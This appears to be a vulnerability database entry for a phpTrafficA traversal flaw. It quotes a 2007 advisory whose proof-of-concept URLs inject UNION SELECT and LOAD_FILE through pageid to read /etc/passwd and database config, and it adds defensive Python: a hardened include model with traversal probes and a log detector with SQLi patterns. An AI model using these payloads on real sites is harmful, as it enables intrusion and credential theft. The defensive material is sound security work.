phpTrafficA index.php Directory Traversal Vulnerability

Vulnerability ID: 1113180    Vulnerability type: Path traversal
Published: 2007-06-24    Updated: 2007-06-28
CVE ID: CVE-2007-3425    CNNVD ID: CNNVD-200706-462
Platform: PHP    CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/4100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-462
|Vulnerability details
A directory traversal vulnerability exists in phpTrafficA's index.php: the lang parameter is used to build the path of a file that the script includes, so a remote attacker can supply "../" sequences and include arbitrary local files. The advisory below lists phpTrafficA 1.4.2 and earlier as affected; the vendor acknowledged the issues and the references link the 1.4.3 release.
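The following is an added example, not code from phpTrafficA or from the advisory: it models the include pattern described above (a user-controlled ?lang= value joined onto a directory and handed to include) next to two hardened versions. The directory layout, the language table and the assumption that the raw value is used without an appended extension are all mine.

```python
"""Model of the lang-parameter include behind CVE-2007-3425 plus a hardened
replacement.  Added example: phpTrafficA's real index.php is not reproduced
here; the directory layout, language set and the assumption that the raw
?lang= value is used as a path without an appended extension are assumptions."""
import posixpath
from typing import Optional

LANG_DIR = "/var/www/stats/Php/lang"                            # assumed layout
LANG_FILES = {"en": "en.php", "fr": "fr.php", "de": "de.php"}   # assumed set


def vulnerable_lang_path(lang: str) -> str:
    """Unpatched pattern: the decoded ?lang= value is joined onto the language
    directory and handed to include().  '..' segments are honoured, so the
    caller can name any file the web server process can read."""
    return posixpath.normpath(posixpath.join(LANG_DIR, lang))


def contained_lang_path(lang: str) -> Optional[str]:
    """Containment check only: normalise and require the result to stay under
    LANG_DIR.  Stops traversal, but still lets the caller pick any file inside
    the directory.  On a live server use os.path.realpath() so a symlink inside
    LANG_DIR cannot point back outside it."""
    candidate = posixpath.normpath(posixpath.join(LANG_DIR, lang))
    # commonpath (not startswith) so "/lang" is not fooled by "/lang2/..."
    if posixpath.commonpath([candidate, LANG_DIR]) != LANG_DIR:
        return None
    return candidate


def safe_lang_path(lang: str) -> Optional[str]:
    """Preferred fix: the request value is only a key into a fixed table, so the
    user never controls a path component at all.  Containment is kept as
    defence in depth in case the table is later populated from configuration."""
    filename = LANG_FILES.get(lang)
    if filename is None:
        return None
    return contained_lang_path(filename)


if __name__ == "__main__":
    # Constructed probes: one benign value and two traversal shapes.
    for probe in ("en", "../../../../../../etc/passwd", "../config_sql.php"):
        print(f"{probe!r}: vulnerable={vulnerable_lang_path(probe)} "
              f"contained={contained_lang_path(probe)} safe={safe_lang_path(probe)}")
```

The containment-only variant is shown because it is the fix people usually reach for first; it blocks the traversal but still lets a caller include anything that happens to live in the language directory, which is why the allowlist version is the one to ship.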
|Exploit
Application: phpTrafficA <= 1.4.2
Web Site: http://soft.zoneo.net/phpTrafficA/
Versions: all
Platform: linux, windows
Bug: SQL injection

-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Credits

===========
1) Introduction
===========

"phpTrafficA is a GPL statistical tool for web traffic analysis, written in php and mySQL.
It can track access counts to your website, search engines, keywords, and referrers that lead to you,
operating systems, web browsers, visitor retention, path analysis, and a lot more!"

======
2) Bug
======

SQL injection

=====
3) Proof of concept
=====

Example of exploitation:
1)http://site.com/index.php?mode=stats&sid=THE_WEB_SITE_SID_HERE&show=page&pageid=-32+union+select+1,@@version/*

2)http://site.com/index.php?mode=stats&sid=THE_WEB_SITE_SID_HERE&show=page&pageid=-32+union+select+1,LOAD_FILE(0x2F6574632F706173737764)/*
--> loads a file such as /etc/passwd or /path/www/stats/Php/config_sql.php

?lang= is also vulnerable to XSS attacks, and as Hamid Ebadi has mentioned, $lang is also vulnerable to directory traversal

=====
4) Credits
=====

laurent gaffie
contact : laurent.gaffie@gmail.com

# milw0rm.com [2007-06-24]
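The two request shapes in the advisory above (a UNION SELECT injected through pageid, including the LOAD_FILE variant, and traversal or script tags through lang) are easy to spot in web-server logs after the fact. The following detection logic is an added example, not part of the advisory or of phpTrafficA; the log lines it runs over are constructed for the demo, and the /stats/ path and the parameter rules are assumptions.

```python
"""Detection logic for the request patterns in the advisory (UNION-based SQL
injection via pageid, traversal and script injection via lang), run over
constructed Apache combined-format log lines.  Added example; not part of the
advisory or of phpTrafficA."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample traffic (not real logs).  Lines 1 and 5 are benign;
# 2 and 3 mirror the PoC URLs from the advisory; 4 is the lang traversal;
# 6 is the lang XSS probe the advisory also mentions.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Jun/2007:10:00:01 +0000] "GET /stats/index.php?mode=stats&sid=1&show=page&pageid=32 HTTP/1.1" 200 5120
203.0.113.9 - - [24/Jun/2007:10:00:07 +0000] "GET /stats/index.php?mode=stats&sid=1&show=page&pageid=-32+union+select+1,@@version/* HTTP/1.1" 200 4871
203.0.113.9 - - [24/Jun/2007:10:00:12 +0000] "GET /stats/index.php?mode=stats&sid=1&show=page&pageid=-32+union+select+1,LOAD_FILE(0x2F6574632F706173737764)/* HTTP/1.1" 200 6230
203.0.113.9 - - [24/Jun/2007:10:00:20 +0000] "GET /stats/index.php?lang=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1733
203.0.113.7 - - [24/Jun/2007:10:01:02 +0000] "GET /stats/index.php?lang=en HTTP/1.1" 200 5120
203.0.113.9 - - [24/Jun/2007:10:01:30 +0000] "GET /stats/index.php?lang=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5104
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# [\s/*]+ between the keywords also catches the union/**/select spacing trick.
SQLI_RE = re.compile(r"union[\s/*]+select|load_file\s*\(", re.IGNORECASE)
# What a legitimate language code looks like (assumed: "en", "en_US", "fr-CA").
LANG_OK_RE = re.compile(r"[A-Za-z]{2}(?:[_-][A-Za-z]{2})?")


def classify_param(name, value):
    """Return a reason string if a decoded query parameter looks hostile,
    else None.  Rules are specific to the two parameters in the advisory."""
    if name == "pageid":
        if re.fullmatch(r"-?\d+", value):      # the only legitimate shape
            return None
        return "sqli" if SQLI_RE.search(value) else "non-numeric pageid"
    if name == "lang":
        if "../" in value or "..\\" in value:
            return "traversal"
        return None if LANG_OK_RE.fullmatch(value) else "malformed lang"
    return None


def scan_log(text):
    """Return one finding dict per hostile parameter, in log order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl percent-decodes and turns '+' into spaces, the same
        # normalisation PHP applies before the values reach $_GET.
        for name, value in parse_qsl(query, keep_blank_values=True):
            reason = classify_param(name, value)
            if reason:
                findings.append({"line": lineno, "param": name,
                                 "reason": reason, "value": value})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['param']} -> {f['reason']}: {f['value']!r}")
```

Matching is done on the decoded value rather than the raw URL so that percent-encoded traversal (..%2F) and '+'-separated SQL keywords are seen the way the application saw them; a rule that only looks for the literal string "../" in the raw request line misses line 4 entirely.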
|References

Source: VIM
Name: 20070626 vendor ACK for phpTrafficA issues
Link: http://www.attrition.org/pipermail/vim/2007-June/001684.html
Source: soft.zoneo.net
Link: http://soft.zoneo.net/phpTrafficA/Files/get.php?phpTrafficA-1.4.3.tgz
Source: MILW0RM
Name: 4100
Link: http://www.milw0rm.com/exploits/4100
Source: XF
Name: phptraffica-index-directory-traversal (35014)
Link: http://xforce.iss.net/xforce/xfdb/35014
Source: BUGTRAQ
Name: 20070624 phpTrafficA <= 1.4.2
Link: http://www.securityfocus.com/archive/1/archive/1/472211/100/0/threaded
Source: VUPEN
Name: ADV-2007-2311
Link: http://www.frsirt.com/english/advisories/2007/2311
Source: SECUNIA
Name: 25773
Link: http://secunia.com/advisories/25773